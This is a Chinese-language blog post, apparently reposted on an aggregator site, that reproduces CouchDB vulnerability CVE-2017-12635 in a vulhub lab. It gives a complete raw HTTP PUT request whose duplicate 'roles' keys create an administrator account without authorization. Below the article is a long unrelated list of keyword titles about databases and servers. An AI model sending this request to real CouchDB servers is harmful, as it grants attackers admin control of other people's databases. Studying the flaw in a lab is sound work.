couchdb垂直越权漏洞CVE-2017-12635复现是怎么进行的
发表于:2025-02-23 作者:千家信息网编辑
千家信息网最后更新 2025年02月23日,这篇文章将为大家详细讲解有关couchdb垂直越权漏洞CVE-2017-12635复现是怎么进行的,文章内容质量较高,因此小编分享给大家做个参考,希望大家阅读完这篇文章后对相关知识有一定的了解。Cou
千家信息网最后更新 2025年02月23日couchdb垂直越权漏洞CVE-2017-12635复现是怎么进行的
这篇文章将为大家详细讲解有关couchdb垂直越权漏洞CVE-2017-12635复现是怎么进行的,文章内容质量较高,因此小编分享给大家做个参考,希望大家阅读完这篇文章后对相关知识有一定的了解。
CouchDB 是一个开源的面向文档的数据库管理系统,可以通过 RESTful JavaScript Object Notation (JSON) API 访问。术语 "Couch" 是 "Cluster Of Unreliable Commodity Hardware" 的首字母缩写,它反映了 CouchDB 的目标具有高度可伸缩性,提供了高可用性和高可靠性,即使运行在容易出现故障的硬件上也是如此。
CVE-2017-12635是由于Erlang和JavaScript对JSON解析方式的不同,导致语句执行产生差异性导致的。这个漏洞可以让任意用户创建管理员,属于垂直权限绕过漏洞。
下面仅作漏洞复现记录与实现,利用流程如下:
一、漏洞环境
目标链接:http://192.168.101.152:5984/
直接访问是这样子的
访问http://192.168.101.152:5984/_utils/后如下
直接点击_users会提示无权访问数据库
二、利用流程
首先发送第一个数据包,会提示403错误,提示只有管理员可以设置角色
但发送包含两个roles的数据包,即可绕过限制,创建一个管理员账户,这里创建了一个账户密码皆为vulhub的管理员账户
PUT /_users/org.couchdb.user:vulhub HTTP/1.1Host: 192.168.101.152:5984Accept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/jsonContent-Length: 108{"type": "user","name": "vulhub","roles": ["_admin"],"roles": [],"password": "vulhub"}
再回到前台登录,已经可以访问了
关于couchdb垂直越权漏洞CVE-2017-12635复现是怎么进行的就分享到这里了,希望以上内容可以对大家有一定的帮助,可以学到更多知识。如果觉得文章不错,可以把它分享出去让更多的人看到。
漏洞
管理
数据
管理员
账户
提示
内容
数据库
文章
更多
流程
目标
知识
篇文章
不同
不错
两个
前台
只有
可以通过
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
华为手机有网怎么连接不了服务器
网络安全课程反思
工业控制网络安全态势白皮书
一网科技网络技术有限公司
云服务器文件管理系统
数据库级联操作
saas架构模式数据库
公共域名服务器与本地域名服务器
数据库对公司的好处
佛山工业控制软件开发
网络安全管理员证书照片尺寸
济南网警检查网络安全
服务器如何关闭端口
美国08年房价数据库
数据库系统概念及其特点
植物大战僵尸2服务器在哪里
研究方向分布式数据库
淘宝上vps服务器安全吗
王者微信区不同服务器可以一起玩
显示服务器正在维护中是什么意思
美国网络安全行业规模
江夏区口译服务器
数据库可视化怎么用
加强网络安全立法意义
台州壁球软件开发
服务器专研
oracle查询当前数据库
数据库应用技术第二版网上书店
研究方向分布式数据库
java实现数据库备份